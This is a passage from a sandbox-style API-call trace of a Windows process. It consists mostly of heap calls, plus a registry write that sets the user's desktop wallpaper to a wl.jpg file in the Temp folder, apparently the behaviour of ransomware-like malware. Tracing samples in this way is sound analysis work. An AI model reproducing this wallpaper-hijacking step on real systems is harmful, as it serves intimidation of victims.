wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0231.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0231.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0231.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0231.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0231.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0231.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0231.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0231.365] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0231.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0231.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0231.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0231.366] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0231.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0231.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0231.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0231.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0231.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0231.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0231.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0231.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0231.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0231.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73568 [0231.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0231.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0231.367] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0231.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0231.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0231.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0231.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0231.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0231.367] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0231.367] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0231.368] RegCloseKey (hKey=0x4e0) returned 0x0 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73568 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0231.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0231.368] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0231.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0231.368] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0231.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0231.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0231.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0231.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0231.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0231.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0231.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0231.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0231.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0231.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0231.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0231.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0231.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0231.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0231.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0231.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0231.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0231.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0231.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0231.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0231.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0231.371] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0231.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0231.372] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0231.372] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0231.372] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0231.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0231.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0231.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0231.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0231.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0231.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0231.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0231.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0231.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0231.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0231.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0231.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0231.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0231.374] 